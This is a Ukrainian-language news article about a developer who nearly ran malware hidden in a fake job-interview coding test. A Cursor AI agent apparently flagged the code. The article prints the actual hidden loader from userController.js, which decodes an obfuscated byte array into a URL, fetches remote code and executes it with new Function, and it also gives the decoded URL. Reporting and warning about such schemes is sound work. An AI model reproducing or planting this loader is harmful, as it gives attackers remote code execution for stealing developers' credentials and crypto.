Агент Cursor врятував розробника від хакера, який видавав себе за українця

Розробник Девід Додда каже, що був лише «за 30 секунд» від запуску шкідливого програмного забезпечення на власному комп’ютері після того, як мало не став жертвою шахрайства на технічній співбесіді. Фейковий роботодавець, який підсунув кандидату зловмисний код, видавав себе за українця Миколу Янчия (Mykola Yanchii), блокчейн-директора компанії Symfa, пише The Register.

За типовою схемою, яку часто використовують північнокорейські хакери, претендента на роботу обманом змушують завантажити шкідливе програмне забезпечення, замасковане під тестовий код, після чого цей софт краде конфіденційну інформацію та криптовалюту, або отримує довгостроковий доступ до корпоративних мереж.

Під час розмови з Доддою шахрай заявив, що шукає розробників на неповний робочий день. «Микола Янчий» зв’язався з кандидатом через LinkedIn (профіль згодом видалили). 

«Микола Янчий виглядав на 100% справжнім. Директор з блокчейну. Належний досвід роботи. Навіть мав ці неприємні пости в LinkedIn про «інновації» та «консалтинг з блокчейну»», — написав Додда.

Тому він погодився на співбесіду, заплановану через Calendly, але спочатку Янчий хотів, щоб кандидат виконав тестовий проект для оцінки навичок програмування.

За словами Додди, тестом була кодова база React/Node. «Репозиторій Bitbucket виглядав професійно. Чистий README. Належна документація. Навіть було те корпоративне фото жінки з планшетом, що стоїть перед будинком».

Але оскільки він запізнився на співбесіду, тому мав лише 30 хвилин на перевірку коду, і замість того, щоб протестувати його в «пісочниці». Додда «зробив те, що роблять ліниві розробники — почав розбиратись в кодовій базі, не запустивши її спочатку».

Після очищення коду та виправлення деяких помилок Додда вже збирався натиснути «npm start» та запустити код. Але потім, у момент параної, він попросив свого агента Cursor AI перевірити наявність підозрілого коду, і це його врятувало.

«Одна проста підказка зі штучним інтелектом врятувала мене від катастрофи», — розповів розробник. «Не складні засоби безпеки. Не дороге антивірусне програмне забезпечення. Просто попросив свого асистента з кодування пошукати підозрілі закономірності, перш ніж запускати невідомий код».

«І чорт забирай! Прямо посередині server/controllers/userController.js сиділа ця красуня»:

//Get Cookie  
(async () => {  
    const byteArray = [  
        104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105, 110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51, 98, 50, 48, 51, 49, 102, 98, 57  
    ];  
    const uint8Array = new Uint8Array(byteArray);  
    const decoder = new TextDecoder('utf-8');  
    axios.get(decoder.decode(uint8Array))  
        .then(response => {  
            new Function("require", response.data.model)(require);  
        })  
        .catch(error => { });  
})();

 

«Заплутаний. Підступний. Злий. І на 100% активний — вбудований між легітимними функціями адміністратора, готовий до виконання з повними привілеями сервера в момент доступу до маршрутів адміністратора.

Я розшифрував цей масив байтів: https://api.npoint.io/2c458612399c3b2031fb9

Коли я вперше натиснув на посилання, воно було активним. Я захопив корисне навантаження. Чисте шкідливе програмне забезпечення. Таке, що краде все — криптогаманці, файли, паролі, все ваше цифрове існування.

А ось у чому фішка: URL-адреса зникла рівно через 24 години. Ці хлопці не жартували — у них була налаштована інфраструктура для швидкого спалювання доказів», — пише Додда.